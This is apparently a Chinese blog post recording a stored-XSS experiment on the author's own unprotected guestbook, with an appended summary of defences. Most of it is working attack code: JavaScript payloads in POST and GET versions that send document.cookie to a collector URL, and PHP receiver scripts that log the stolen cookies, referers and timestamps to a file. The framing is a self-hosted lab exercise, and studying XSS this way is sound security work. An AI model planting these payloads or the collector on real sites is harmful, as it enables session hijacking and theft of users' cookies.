XSS之存储型xss获取cookie试验(ajax方法)

1、首先我写了个非常简易的留言板,没有做人任何安全处理,能使用存储型xss

2、留言里写入能够发送请求的js代码,提交后服务器将代码存储到服务器中,用户访问的时候就会触发这段xss代码。让访问这个页面的用户能够发送一个请求并附带自己的cookie信息。

3、第二步请求的目标主机上放置一个脚本用来接收这个请求然后保存在文本中

具体步骤:

一、登录我写的留言板,留言写入xss代码


提交后页面显示如下:

内容被被保存到数据库中,每次用户查看这条留言,就会触发一次xss。

再次访问这个页面,查看控制台,访问这个页面时发送了POST请求

二、写一个页面用用来接收这个请求中的cookie。请求的是我本机上的cookie1.php文件。并保存到一个文件中。

OK了 。

以下的是发送POST请求js代码:

<script>
var url='http://127.0.0.1/cookie1.php';
var data='cookie='+document.cookie;
var xhr= new XMLHttpRequest();
xhr.open('POST',url);
xhr.setRequestHeader('content-type','application/x-www-form-urlencoded');
xhr.send(data);
</script>

send(data),只适用于发送POST数据。发送方式为get请求发送的时候send()参数为空。

接收端代码:

<?php
date_default_timezone_set("Asia/shanghai");
$cookie = $_POST['cookie'];
$time = date("Y-m-d H:i");
echo $time;
$refer = $_SERVER['HTTP_REFERER'];
$content = $time."::"."$refer"."::".$cookie."\r\n";
file_put_contents("cookie.txt", $content, FILE_APPEND);
?>

 

 

这是GET版的:

发送GET请求的js代码:

<script>
var url='http://127.0.0.1/cookie1.php';
var data='?cookie='+document.cookie;
var xhr= new XMLHttpRequest();
xhr.open('GET',url+data);
xhr.send();
</script>

接受端代码:

<?php
date_default_timezone_set("Asia/shanghai");
$cookie = $_GET['cookie'];
$time = date("Y-m-d H:i");
echo $time;
$refer = $_SERVER['HTTP_REFERER'];
$content = $time."::"."$refer"."::".$cookie."\r\n";
file_put_contents("cookie.txt", $content, FILE_APPEND);
?>

GET版本的效果:




  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS(跨站脚本)攻击是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来获取用户的敏感信息,如cookie。根据提供的引用内容,可以看出这是一个XSS攻击的示例代码。 引用\[1\]和引用\[2\]是两种不同的XSS攻击方式。引用\[1\]是通过GET请求将用户的cookie发送到指定的URL,而引用\[2\]是通过POST请求将cookie发送到指定的URL。这些代码都是恶意的,旨在窃取用户的cookie信息。 引用\[3\]是一个PHP脚本,用于接收并记录被窃取的cookie信息。该脚本将接收到的cookie、时间戳和来源URL写入到一个名为"cookie.txt"的文件中。 要防止XSS攻击,网站开发者应该采取以下措施: 1. 对用户输入进行严格的过滤和验证,确保不会执行恶意脚本。 2. 使用安全的编码方式,如将特殊字符进行转义,以防止脚本注入。 3. 设置HTTP响应头中的"X-XSS-Protection"为"1; mode=block",以启用浏览器的内置XSS过滤器。 4. 使用HTTP Only标志来设置cookie,以防止JavaScript访问cookie。 如果您是网站用户,请确保您访问的网站是可信的,并避免在不信任的网站上输入个人敏感信息。如果您是网站开发者,请确保您的网站采取了适当的安全措施来防止XSS攻击。 #### 引用[.reference_title] - *1* *2* *3* [XSS存储xss获取cookie试验(ajax方法)](https://blog.csdn.net/qq_34847808/article/details/80681314)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值